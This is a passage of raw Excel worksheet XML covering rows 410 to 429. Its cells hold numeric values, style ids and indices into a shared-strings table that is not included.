      <c r="D410" s="14"/>
      <c r="E410" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F410" s="14"/>
      <c r="G410" s="29">
        <v>-3.0</v>
      </c>
      <c r="H410" s="29">
        <v>553.0</v>
      </c>
      <c r="I410" s="29">
        <v>36899.0</v>
      </c>
      <c r="J410" s="15"/>
      <c r="K410" s="15"/>
      <c r="L410" s="15"/>
      <c r="M410" s="15"/>
      <c r="N410" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O410" s="29">
        <v>1.0</v>
      </c>
      <c r="P410" s="29">
        <v>3.0</v>
      </c>
      <c r="Q410" s="15"/>
      <c r="R410" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S410" s="15"/>
      <c r="T410" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U410" s="5"/>
      <c r="V410" s="5"/>
      <c r="W410" s="47"/>
      <c r="X410" s="45"/>
      <c r="Y410" s="45"/>
      <c r="Z410" s="38" t="s">
        <v>2296</v>
      </c>
      <c r="AA410" s="39" t="s">
        <v>2297</v>
      </c>
      <c r="AB410" s="38" t="s">
        <v>1083</v>
      </c>
      <c r="AC410" s="40">
        <v>48739.0</v>
      </c>
      <c r="AD410" s="5"/>
      <c r="AE410" s="14"/>
      <c r="AF410" s="14"/>
    </row>
    <row r="411">
      <c r="A411" s="6">
        <f t="shared" si="1"/>
        <v>0.3682331857</v>
      </c>
      <c r="B411" s="29">
        <v>1.0</v>
      </c>
      <c r="C411" s="29">
        <v>254845.0</v>
      </c>
      <c r="D411" s="14"/>
      <c r="E411" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F411" s="14"/>
      <c r="G411" s="29">
        <v>1.0</v>
      </c>
      <c r="H411" s="29">
        <v>122.0</v>
      </c>
      <c r="I411" s="29">
        <v>233971.0</v>
      </c>
      <c r="J411" s="15"/>
      <c r="K411" s="15"/>
      <c r="L411" s="15"/>
      <c r="M411" s="15"/>
      <c r="N411" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O411" s="29">
        <v>1.0</v>
      </c>
      <c r="P411" s="29">
        <v>0.0</v>
      </c>
      <c r="Q411" s="15"/>
      <c r="R411" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S411" s="15"/>
      <c r="T411" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U411" s="5"/>
      <c r="V411" s="5"/>
      <c r="W411" s="47"/>
      <c r="X411" s="45"/>
      <c r="Y411" s="45"/>
      <c r="Z411" s="38" t="s">
        <v>2298</v>
      </c>
      <c r="AA411" s="39" t="s">
        <v>2299</v>
      </c>
      <c r="AB411" s="38" t="s">
        <v>1304</v>
      </c>
      <c r="AC411" s="40">
        <v>254843.0</v>
      </c>
      <c r="AD411" s="5"/>
      <c r="AE411" s="14"/>
      <c r="AF411" s="14"/>
    </row>
    <row r="412">
      <c r="A412" s="6">
        <f t="shared" si="1"/>
        <v>0.175640339</v>
      </c>
      <c r="B412" s="29">
        <v>1.0</v>
      </c>
      <c r="C412" s="15"/>
      <c r="D412" s="14"/>
      <c r="E412" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F412" s="14"/>
      <c r="G412" s="29">
        <v>1.0</v>
      </c>
      <c r="H412" s="29">
        <v>37.0</v>
      </c>
      <c r="I412" s="29">
        <v>250518.0</v>
      </c>
      <c r="J412" s="15"/>
      <c r="K412" s="15"/>
      <c r="L412" s="15"/>
      <c r="M412" s="15"/>
      <c r="N412" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O412" s="29">
        <v>0.0</v>
      </c>
      <c r="P412" s="29">
        <v>0.0</v>
      </c>
      <c r="Q412" s="15"/>
      <c r="R412" s="15"/>
      <c r="S412" s="15"/>
      <c r="T412" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U412" s="5"/>
      <c r="V412" s="5"/>
      <c r="W412" s="47"/>
      <c r="X412" s="45"/>
      <c r="Y412" s="45"/>
      <c r="Z412" s="38" t="s">
        <v>2300</v>
      </c>
      <c r="AA412" s="39" t="s">
        <v>2301</v>
      </c>
      <c r="AB412" s="38" t="s">
        <v>2302</v>
      </c>
      <c r="AC412" s="40">
        <v>258547.0</v>
      </c>
      <c r="AD412" s="5"/>
      <c r="AE412" s="14"/>
      <c r="AF412" s="14"/>
    </row>
    <row r="413">
      <c r="A413" s="6">
        <f t="shared" si="1"/>
        <v>0.723571569</v>
      </c>
      <c r="B413" s="29">
        <v>1.0</v>
      </c>
      <c r="C413" s="15"/>
      <c r="D413" s="14"/>
      <c r="E413" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F413" s="14"/>
      <c r="G413" s="29">
        <v>1.0</v>
      </c>
      <c r="H413" s="29">
        <v>392.0</v>
      </c>
      <c r="I413" s="29">
        <v>86861.0</v>
      </c>
      <c r="J413" s="15"/>
      <c r="K413" s="15"/>
      <c r="L413" s="15"/>
      <c r="M413" s="14"/>
      <c r="N413" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O413" s="29">
        <v>0.0</v>
      </c>
      <c r="P413" s="29">
        <v>4.0</v>
      </c>
      <c r="Q413" s="15"/>
      <c r="R413" s="15"/>
      <c r="S413" s="15"/>
      <c r="T413" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U413" s="5"/>
      <c r="V413" s="5"/>
      <c r="W413" s="47"/>
      <c r="X413" s="45"/>
      <c r="Y413" s="45"/>
      <c r="Z413" s="38" t="s">
        <v>2303</v>
      </c>
      <c r="AA413" s="39" t="s">
        <v>2304</v>
      </c>
      <c r="AB413" s="38" t="s">
        <v>2305</v>
      </c>
      <c r="AC413" s="40">
        <v>100357.0</v>
      </c>
      <c r="AD413" s="5"/>
      <c r="AE413" s="14"/>
      <c r="AF413" s="14"/>
    </row>
    <row r="414">
      <c r="A414" s="6">
        <f t="shared" si="1"/>
        <v>0.5939723602</v>
      </c>
      <c r="B414" s="29">
        <v>1.0</v>
      </c>
      <c r="C414" s="29">
        <v>138029.0</v>
      </c>
      <c r="D414" s="14"/>
      <c r="E414" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F414" s="14"/>
      <c r="G414" s="29">
        <v>1.0</v>
      </c>
      <c r="H414" s="29">
        <v>198.0</v>
      </c>
      <c r="I414" s="29">
        <v>3053.0</v>
      </c>
      <c r="J414" s="15"/>
      <c r="K414" s="29">
        <v>3053.0</v>
      </c>
      <c r="L414" s="15"/>
      <c r="M414" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N414" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O414" s="29">
        <v>2.0</v>
      </c>
      <c r="P414" s="29">
        <v>2.0</v>
      </c>
      <c r="Q414" s="15"/>
      <c r="R414" s="15"/>
      <c r="S414" s="15"/>
      <c r="T414" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U414" s="5"/>
      <c r="V414" s="5"/>
      <c r="W414" s="47"/>
      <c r="X414" s="45"/>
      <c r="Y414" s="45"/>
      <c r="Z414" s="38" t="s">
        <v>2306</v>
      </c>
      <c r="AA414" s="39" t="s">
        <v>2307</v>
      </c>
      <c r="AB414" s="38" t="s">
        <v>2262</v>
      </c>
      <c r="AC414" s="40">
        <v>138023.0</v>
      </c>
      <c r="AD414" s="5"/>
      <c r="AE414" s="14"/>
      <c r="AF414" s="14"/>
    </row>
    <row r="415">
      <c r="A415" s="6">
        <f t="shared" si="1"/>
        <v>0.805247274</v>
      </c>
      <c r="B415" s="29">
        <v>1.0</v>
      </c>
      <c r="C415" s="29">
        <v>219486.0</v>
      </c>
      <c r="D415" s="14"/>
      <c r="E415" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F415" s="14"/>
      <c r="G415" s="29">
        <v>2.0</v>
      </c>
      <c r="H415" s="29">
        <v>186.0</v>
      </c>
      <c r="I415" s="29">
        <v>219644.0</v>
      </c>
      <c r="J415" s="15"/>
      <c r="K415" s="15"/>
      <c r="L415" s="15"/>
      <c r="M415" s="14"/>
      <c r="N415" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O415" s="29">
        <v>1.0</v>
      </c>
      <c r="P415" s="29">
        <v>1.0</v>
      </c>
      <c r="Q415" s="15"/>
      <c r="R415" s="15"/>
      <c r="S415" s="15"/>
      <c r="T415" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U415" s="5"/>
      <c r="V415" s="5"/>
      <c r="W415" s="47"/>
      <c r="X415" s="45"/>
      <c r="Y415" s="45"/>
      <c r="Z415" s="38" t="s">
        <v>2308</v>
      </c>
      <c r="AA415" s="39" t="s">
        <v>2309</v>
      </c>
      <c r="AB415" s="38" t="s">
        <v>2310</v>
      </c>
      <c r="AC415" s="40">
        <v>219481.0</v>
      </c>
      <c r="AD415" s="5"/>
      <c r="AE415" s="14"/>
      <c r="AF415" s="14"/>
    </row>
    <row r="416">
      <c r="A416" s="6">
        <f t="shared" si="1"/>
        <v>0.7882013033</v>
      </c>
      <c r="B416" s="29">
        <v>1.0</v>
      </c>
      <c r="C416" s="29">
        <v>254650.0</v>
      </c>
      <c r="D416" s="14"/>
      <c r="E416" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F416" s="14"/>
      <c r="G416" s="29">
        <v>0.0</v>
      </c>
      <c r="H416" s="29">
        <v>241.0</v>
      </c>
      <c r="I416" s="29">
        <v>180041.0</v>
      </c>
      <c r="J416" s="15"/>
      <c r="K416" s="15"/>
      <c r="L416" s="15"/>
      <c r="M416" s="15"/>
      <c r="N416" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O416" s="29">
        <v>3.0</v>
      </c>
      <c r="P416" s="29">
        <v>4.0</v>
      </c>
      <c r="Q416" s="15"/>
      <c r="R416" s="15"/>
      <c r="S416" s="15"/>
      <c r="T416" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U416" s="5"/>
      <c r="V416" s="5"/>
      <c r="W416" s="47"/>
      <c r="X416" s="45"/>
      <c r="Y416" s="45"/>
      <c r="Z416" s="38" t="s">
        <v>2311</v>
      </c>
      <c r="AA416" s="39" t="s">
        <v>2312</v>
      </c>
      <c r="AB416" s="38" t="s">
        <v>2313</v>
      </c>
      <c r="AC416" s="40">
        <v>254649.0</v>
      </c>
      <c r="AD416" s="5"/>
      <c r="AE416" s="14"/>
      <c r="AF416" s="14"/>
    </row>
    <row r="417">
      <c r="A417" s="6">
        <f t="shared" si="1"/>
        <v>0.4039903474</v>
      </c>
      <c r="B417" s="29">
        <v>1.0</v>
      </c>
      <c r="C417" s="29">
        <v>79876.0</v>
      </c>
      <c r="D417" s="14"/>
      <c r="E417" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F417" s="14"/>
      <c r="G417" s="29">
        <v>5.0</v>
      </c>
      <c r="H417" s="29">
        <v>356.0</v>
      </c>
      <c r="I417" s="29">
        <v>53853.0</v>
      </c>
      <c r="J417" s="15"/>
      <c r="K417" s="29">
        <v>5405.0</v>
      </c>
      <c r="L417" s="15"/>
      <c r="M417" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N417" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O417" s="29">
        <v>1.0</v>
      </c>
      <c r="P417" s="29">
        <v>0.0</v>
      </c>
      <c r="Q417" s="15"/>
      <c r="R417" s="15"/>
      <c r="S417" s="15"/>
      <c r="T417" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U417" s="5"/>
      <c r="V417" s="5"/>
      <c r="W417" s="45"/>
      <c r="X417" s="45"/>
      <c r="Y417" s="45"/>
      <c r="Z417" s="38" t="s">
        <v>2314</v>
      </c>
      <c r="AA417" s="39" t="s">
        <v>2315</v>
      </c>
      <c r="AB417" s="38" t="s">
        <v>2316</v>
      </c>
      <c r="AC417" s="40">
        <v>79874.0</v>
      </c>
      <c r="AD417" s="5"/>
      <c r="AE417" s="14"/>
      <c r="AF417" s="14"/>
    </row>
    <row r="418">
      <c r="A418" s="6">
        <f t="shared" si="1"/>
        <v>0.4683868793</v>
      </c>
      <c r="B418" s="29">
        <v>1.0</v>
      </c>
      <c r="C418" s="15"/>
      <c r="D418" s="14"/>
      <c r="E418" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F418" s="14"/>
      <c r="G418" s="29">
        <v>0.0</v>
      </c>
      <c r="H418" s="29">
        <v>120.0</v>
      </c>
      <c r="I418" s="29">
        <v>242519.0</v>
      </c>
      <c r="J418" s="15"/>
      <c r="K418" s="29">
        <v>6253.0</v>
      </c>
      <c r="L418" s="15"/>
      <c r="M418" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N418" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O418" s="29">
        <v>0.0</v>
      </c>
      <c r="P418" s="29">
        <v>2.0</v>
      </c>
      <c r="Q418" s="15"/>
      <c r="R418" s="15"/>
      <c r="S418" s="15"/>
      <c r="T418" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U418" s="5"/>
      <c r="V418" s="5"/>
      <c r="W418" s="47"/>
      <c r="X418" s="45"/>
      <c r="Y418" s="45"/>
      <c r="Z418" s="38" t="s">
        <v>2317</v>
      </c>
      <c r="AA418" s="39" t="s">
        <v>2318</v>
      </c>
      <c r="AB418" s="38" t="s">
        <v>2319</v>
      </c>
      <c r="AC418" s="40">
        <v>238160.0</v>
      </c>
      <c r="AD418" s="5"/>
      <c r="AE418" s="14"/>
      <c r="AF418" s="14"/>
    </row>
    <row r="419">
      <c r="A419" s="6">
        <f t="shared" si="1"/>
        <v>0.342414609</v>
      </c>
      <c r="B419" s="29">
        <v>1.0</v>
      </c>
      <c r="C419" s="15"/>
      <c r="D419" s="14"/>
      <c r="E419" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F419" s="14"/>
      <c r="G419" s="29">
        <v>2.0</v>
      </c>
      <c r="H419" s="29">
        <v>333.0</v>
      </c>
      <c r="I419" s="29">
        <v>68190.0</v>
      </c>
      <c r="J419" s="15"/>
      <c r="K419" s="29">
        <v>6253.0</v>
      </c>
      <c r="L419" s="15"/>
      <c r="M419" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N419" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O419" s="29">
        <v>2.0</v>
      </c>
      <c r="P419" s="29">
        <v>1.0</v>
      </c>
      <c r="Q419" s="15"/>
      <c r="R419" s="15"/>
      <c r="S419" s="15"/>
      <c r="T419" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U419" s="5"/>
      <c r="V419" s="5"/>
      <c r="W419" s="47"/>
      <c r="X419" s="45"/>
      <c r="Y419" s="45"/>
      <c r="Z419" s="38" t="s">
        <v>2320</v>
      </c>
      <c r="AA419" s="39" t="s">
        <v>2321</v>
      </c>
      <c r="AB419" s="38" t="s">
        <v>2322</v>
      </c>
      <c r="AC419" s="40">
        <v>195100.0</v>
      </c>
      <c r="AD419" s="5"/>
      <c r="AE419" s="14"/>
      <c r="AF419" s="14"/>
    </row>
    <row r="420">
      <c r="A420" s="6">
        <f t="shared" si="1"/>
        <v>0.4089339172</v>
      </c>
      <c r="B420" s="29">
        <v>1.0</v>
      </c>
      <c r="C420" s="29">
        <v>264213.0</v>
      </c>
      <c r="D420" s="14"/>
      <c r="E420" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F420" s="14"/>
      <c r="G420" s="29">
        <v>0.0</v>
      </c>
      <c r="H420" s="29">
        <v>64.0</v>
      </c>
      <c r="I420" s="29">
        <v>281790.0</v>
      </c>
      <c r="J420" s="15"/>
      <c r="K420" s="29">
        <v>281790.0</v>
      </c>
      <c r="L420" s="15"/>
      <c r="M420" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N420" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O420" s="29">
        <v>1.0</v>
      </c>
      <c r="P420" s="29">
        <v>5.0</v>
      </c>
      <c r="Q420" s="15"/>
      <c r="R420" s="15"/>
      <c r="S420" s="15"/>
      <c r="T420" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U420" s="5"/>
      <c r="V420" s="5"/>
      <c r="W420" s="47"/>
      <c r="X420" s="45"/>
      <c r="Y420" s="45"/>
      <c r="Z420" s="38" t="s">
        <v>2323</v>
      </c>
      <c r="AA420" s="39" t="s">
        <v>2324</v>
      </c>
      <c r="AB420" s="38" t="s">
        <v>2325</v>
      </c>
      <c r="AC420" s="40">
        <v>264211.0</v>
      </c>
      <c r="AD420" s="5"/>
      <c r="AE420" s="14"/>
      <c r="AF420" s="14"/>
    </row>
    <row r="421">
      <c r="A421" s="6">
        <f t="shared" si="1"/>
        <v>0.7426852056</v>
      </c>
      <c r="B421" s="29">
        <v>1.0</v>
      </c>
      <c r="C421" s="15"/>
      <c r="D421" s="14"/>
      <c r="E421" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F421" s="14"/>
      <c r="G421" s="29">
        <v>0.0</v>
      </c>
      <c r="H421" s="29">
        <v>13.0</v>
      </c>
      <c r="I421" s="29">
        <v>35360.0</v>
      </c>
      <c r="J421" s="15"/>
      <c r="K421" s="15"/>
      <c r="L421" s="15"/>
      <c r="M421" s="14"/>
      <c r="N421" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O421" s="29">
        <v>0.0</v>
      </c>
      <c r="P421" s="29">
        <v>6.0</v>
      </c>
      <c r="Q421" s="15"/>
      <c r="R421" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S421" s="15"/>
      <c r="T421" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U421" s="5"/>
      <c r="V421" s="5"/>
      <c r="W421" s="47"/>
      <c r="X421" s="45"/>
      <c r="Y421" s="45"/>
      <c r="Z421" s="38" t="s">
        <v>2326</v>
      </c>
      <c r="AA421" s="39" t="s">
        <v>2327</v>
      </c>
      <c r="AB421" s="38" t="s">
        <v>2328</v>
      </c>
      <c r="AC421" s="40">
        <v>223406.0</v>
      </c>
      <c r="AD421" s="5"/>
      <c r="AE421" s="14"/>
      <c r="AF421" s="14"/>
    </row>
    <row r="422">
      <c r="A422" s="6">
        <f t="shared" si="1"/>
        <v>0.1947167167</v>
      </c>
      <c r="B422" s="29">
        <v>1.0</v>
      </c>
      <c r="C422" s="29">
        <v>18896.0</v>
      </c>
      <c r="D422" s="14"/>
      <c r="E422" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F422" s="14"/>
      <c r="G422" s="29">
        <v>6.0</v>
      </c>
      <c r="H422" s="29">
        <v>410.0</v>
      </c>
      <c r="I422" s="29">
        <v>9249.0</v>
      </c>
      <c r="J422" s="15"/>
      <c r="K422" s="15"/>
      <c r="L422" s="15"/>
      <c r="M422" s="15"/>
      <c r="N422" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O422" s="29">
        <v>3.0</v>
      </c>
      <c r="P422" s="29">
        <v>1.0</v>
      </c>
      <c r="Q422" s="15"/>
      <c r="R422" s="15"/>
      <c r="S422" s="15"/>
      <c r="T422" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U422" s="5"/>
      <c r="V422" s="5"/>
      <c r="W422" s="47"/>
      <c r="X422" s="45"/>
      <c r="Y422" s="45"/>
      <c r="Z422" s="38" t="s">
        <v>2329</v>
      </c>
      <c r="AA422" s="39" t="s">
        <v>2330</v>
      </c>
      <c r="AB422" s="38" t="s">
        <v>2331</v>
      </c>
      <c r="AC422" s="40">
        <v>18893.0</v>
      </c>
      <c r="AD422" s="5"/>
      <c r="AE422" s="14"/>
      <c r="AF422" s="14"/>
    </row>
    <row r="423">
      <c r="A423" s="6">
        <f t="shared" si="1"/>
        <v>0.7191586755</v>
      </c>
      <c r="B423" s="29">
        <v>1.0</v>
      </c>
      <c r="C423" s="29">
        <v>202524.0</v>
      </c>
      <c r="D423" s="14"/>
      <c r="E423" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F423" s="14"/>
      <c r="G423" s="29">
        <v>1.0</v>
      </c>
      <c r="H423" s="29">
        <v>479.0</v>
      </c>
      <c r="I423" s="29">
        <v>197946.0</v>
      </c>
      <c r="J423" s="15"/>
      <c r="K423" s="29">
        <v>197946.0</v>
      </c>
      <c r="L423" s="15"/>
      <c r="M423" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N423" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O423" s="29">
        <v>1.0</v>
      </c>
      <c r="P423" s="29">
        <v>3.0</v>
      </c>
      <c r="Q423" s="15"/>
      <c r="R423" s="15"/>
      <c r="S423" s="15"/>
      <c r="T423" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U423" s="5"/>
      <c r="V423" s="5"/>
      <c r="W423" s="47"/>
      <c r="X423" s="45"/>
      <c r="Y423" s="45"/>
      <c r="Z423" s="38" t="s">
        <v>2332</v>
      </c>
      <c r="AA423" s="39" t="s">
        <v>2333</v>
      </c>
      <c r="AB423" s="38" t="s">
        <v>2334</v>
      </c>
      <c r="AC423" s="40">
        <v>202309.0</v>
      </c>
      <c r="AD423" s="5"/>
      <c r="AE423" s="14"/>
      <c r="AF423" s="14"/>
    </row>
    <row r="424">
      <c r="A424" s="6">
        <f t="shared" si="1"/>
        <v>0.6127965321</v>
      </c>
      <c r="B424" s="29">
        <v>1.0</v>
      </c>
      <c r="C424" s="15"/>
      <c r="D424" s="14"/>
      <c r="E424" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F424" s="14"/>
      <c r="G424" s="29">
        <v>0.0</v>
      </c>
      <c r="H424" s="29">
        <v>208.0</v>
      </c>
      <c r="I424" s="29">
        <v>16442.0</v>
      </c>
      <c r="J424" s="15"/>
      <c r="K424" s="29">
        <v>16442.0</v>
      </c>
      <c r="L424" s="15"/>
      <c r="M424" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N424" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O424" s="29">
        <v>1.0</v>
      </c>
      <c r="P424" s="29">
        <v>0.0</v>
      </c>
      <c r="Q424" s="15"/>
      <c r="R424" s="15"/>
      <c r="S424" s="15"/>
      <c r="T424" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U424" s="5"/>
      <c r="V424" s="5"/>
      <c r="W424" s="47"/>
      <c r="X424" s="45"/>
      <c r="Y424" s="45"/>
      <c r="Z424" s="38" t="s">
        <v>2335</v>
      </c>
      <c r="AA424" s="39" t="s">
        <v>2336</v>
      </c>
      <c r="AB424" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC424" s="40">
        <v>205084.0</v>
      </c>
      <c r="AD424" s="5"/>
      <c r="AE424" s="14"/>
      <c r="AF424" s="14"/>
    </row>
    <row r="425">
      <c r="A425" s="6">
        <f t="shared" si="1"/>
        <v>0.4209187652</v>
      </c>
      <c r="B425" s="29">
        <v>1.0</v>
      </c>
      <c r="C425" s="15"/>
      <c r="D425" s="14"/>
      <c r="E425" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F425" s="14"/>
      <c r="G425" s="29">
        <v>2.0</v>
      </c>
      <c r="H425" s="29">
        <v>615.0</v>
      </c>
      <c r="I425" s="29">
        <v>29196.0</v>
      </c>
      <c r="J425" s="15"/>
      <c r="K425" s="15"/>
      <c r="L425" s="15"/>
      <c r="M425" s="15"/>
      <c r="N425" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O425" s="29">
        <v>2.0</v>
      </c>
      <c r="P425" s="29">
        <v>4.0</v>
      </c>
      <c r="Q425" s="15"/>
      <c r="R425" s="15"/>
      <c r="S425" s="15"/>
      <c r="T425" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U425" s="5"/>
      <c r="V425" s="5"/>
      <c r="W425" s="47"/>
      <c r="X425" s="45"/>
      <c r="Y425" s="45"/>
      <c r="Z425" s="38" t="s">
        <v>2337</v>
      </c>
      <c r="AA425" s="39" t="s">
        <v>2338</v>
      </c>
      <c r="AB425" s="38" t="s">
        <v>2339</v>
      </c>
      <c r="AC425" s="40">
        <v>159677.0</v>
      </c>
      <c r="AD425" s="5"/>
      <c r="AE425" s="14"/>
      <c r="AF425" s="14"/>
    </row>
    <row r="426">
      <c r="A426" s="6">
        <f t="shared" si="1"/>
        <v>0.1100112726</v>
      </c>
      <c r="B426" s="29">
        <v>1.0</v>
      </c>
      <c r="C426" s="15"/>
      <c r="D426" s="14"/>
      <c r="E426" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F426" s="14"/>
      <c r="G426" s="29">
        <v>1.0</v>
      </c>
      <c r="H426" s="29">
        <v>442.0</v>
      </c>
      <c r="I426" s="29">
        <v>188315.0</v>
      </c>
      <c r="J426" s="15"/>
      <c r="K426" s="15"/>
      <c r="L426" s="15"/>
      <c r="M426" s="15"/>
      <c r="N426" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O426" s="29">
        <v>3.0</v>
      </c>
      <c r="P426" s="29">
        <v>1.0</v>
      </c>
      <c r="Q426" s="15"/>
      <c r="R426" s="15"/>
      <c r="S426" s="15"/>
      <c r="T426" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U426" s="5"/>
      <c r="V426" s="5"/>
      <c r="W426" s="47"/>
      <c r="X426" s="45"/>
      <c r="Y426" s="45"/>
      <c r="Z426" s="38" t="s">
        <v>2340</v>
      </c>
      <c r="AA426" s="39" t="s">
        <v>2341</v>
      </c>
      <c r="AB426" s="38" t="s">
        <v>2342</v>
      </c>
      <c r="AC426" s="40">
        <v>223339.0</v>
      </c>
      <c r="AD426" s="5"/>
      <c r="AE426" s="14"/>
      <c r="AF426" s="14"/>
    </row>
    <row r="427">
      <c r="A427" s="6">
        <f t="shared" si="1"/>
        <v>0.9671770882</v>
      </c>
      <c r="B427" s="29">
        <v>1.0</v>
      </c>
      <c r="C427" s="14"/>
      <c r="D427" s="14"/>
      <c r="E427" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F427" s="14"/>
      <c r="G427" s="29">
        <v>6.0</v>
      </c>
      <c r="H427" s="29">
        <v>301.0</v>
      </c>
      <c r="I427" s="15"/>
      <c r="J427" s="5" t="s">
        <v>2343</v>
      </c>
      <c r="K427" s="29">
        <v>-1.0</v>
      </c>
      <c r="L427" s="15"/>
      <c r="M427" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N427" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O427" s="29">
        <v>3.0</v>
      </c>
      <c r="P427" s="29">
        <v>0.0</v>
      </c>
      <c r="Q427" s="15"/>
      <c r="R427" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S427" s="15"/>
      <c r="T427" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U427" s="5"/>
      <c r="V427" s="5"/>
      <c r="W427" s="47"/>
      <c r="X427" s="45"/>
      <c r="Y427" s="45"/>
      <c r="Z427" s="38" t="s">
        <v>2344</v>
      </c>
      <c r="AA427" s="39" t="s">
        <v>2345</v>
      </c>
      <c r="AB427" s="38" t="s">
        <v>1488</v>
      </c>
      <c r="AC427" s="40">
        <v>7129.0</v>
      </c>
      <c r="AD427" s="5"/>
      <c r="AE427" s="14"/>
      <c r="AF427" s="14"/>
    </row>
    <row r="428">
      <c r="A428" s="6">
        <f t="shared" si="1"/>
        <v>0.8287913077</v>
      </c>
      <c r="B428" s="29">
        <v>1.0</v>
      </c>
      <c r="C428" s="29">
        <v>213293.0</v>
      </c>
      <c r="D428" s="14"/>
      <c r="E428" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F428" s="14"/>
      <c r="G428" s="29">
        <v>2.0</v>
      </c>
      <c r="H428" s="29">
        <v>316.0</v>
      </c>
      <c r="I428" s="29">
        <v>212028.0</v>
      </c>
      <c r="J428" s="15"/>
      <c r="K428" s="15"/>
      <c r="L428" s="14"/>
      <c r="M428" s="15"/>
      <c r="N428" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O428" s="29">
        <v>1.0</v>
      </c>
      <c r="P428" s="29">
        <v>0.0</v>
      </c>
      <c r="Q428" s="15"/>
      <c r="R428" s="15"/>
      <c r="S428" s="15"/>
      <c r="T428" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U428" s="5"/>
      <c r="V428" s="5"/>
      <c r="W428" s="45"/>
      <c r="X428" s="45"/>
      <c r="Y428" s="45"/>
      <c r="Z428" s="38" t="s">
        <v>2346</v>
      </c>
      <c r="AA428" s="39" t="s">
        <v>2347</v>
      </c>
      <c r="AB428" s="38" t="s">
        <v>2348</v>
      </c>
      <c r="AC428" s="40">
        <v>213290.0</v>
      </c>
      <c r="AD428" s="5"/>
      <c r="AE428" s="14"/>
      <c r="AF428" s="14"/>
    </row>
    <row r="429">
      <c r="A429" s="6">
        <f t="shared" si="1"/>
        <v>0.1993093387</v>
      </c>
      <c r="B429" s="29">
        <v>1.0</v>
      </c>
      <c r="C429" s="15"/>
      <c r="D429" s="14"/>
      <c r="E429" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F429" s="14"/>
      <c r="G429" s="29">
        <v>0.0</v>
      </c>
      <c r="H429" s="29">
        <v>319.0</v>
      </c>
      <c r="I429" s="29">
        <v>21676.0</v>
      </c>
      <c r="J429" s="15"/>
      <c r="K429" s="29">
        <v>21676.0</v>
      </c>
      <c r="L429" s="15"/>
      <c r="M429" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N429" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O429" s="29">
        <v>1.0</v>
      </c>
      <c r="P429" s="29">
        <v>7.0</v>
      </c>
      <c r="Q429" s="15"/>
      <c r="R429" s="15"/>
      <c r="S429" s="15"/>
      <c r="T429" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U429" s="5"/>
      <c r="V429" s="5"/>
      <c r="W429" s="47"/>
      <c r="X429" s="45"/>
      <c r="Y429" s="45"/>
      <c r="Z429" s="38" t="s">
        <v>2349</v>
      </c>
      <c r="AA429" s="39" t="s">
        <v>2350</v>
      </c>
      <c r="AB429" s="38" t="s">
        <v>2351</v>
      </c>
      <c r="AC429" s="40">
        <v>171375.0</v>
      </c>
      <c r="AD429" s="5"/>
